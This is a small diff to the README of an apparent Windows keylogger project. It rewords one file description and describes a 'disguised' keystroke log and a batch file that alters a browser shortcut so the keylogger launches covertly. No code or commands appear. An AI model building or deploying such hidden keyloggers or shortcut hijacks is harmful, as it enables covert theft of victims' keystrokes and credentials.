adeptio/Windows-Keylogger/README.md

 - **Visuals.txt**: Keylogger output (disguised).

-- **launch.bat**: Batch file used to manipuate a browser shortcut into also running our keylogger.
+- **launch.bat**: Batch file used to manipuate a browser shortcut to also run our keylogger.

 On hacker's system: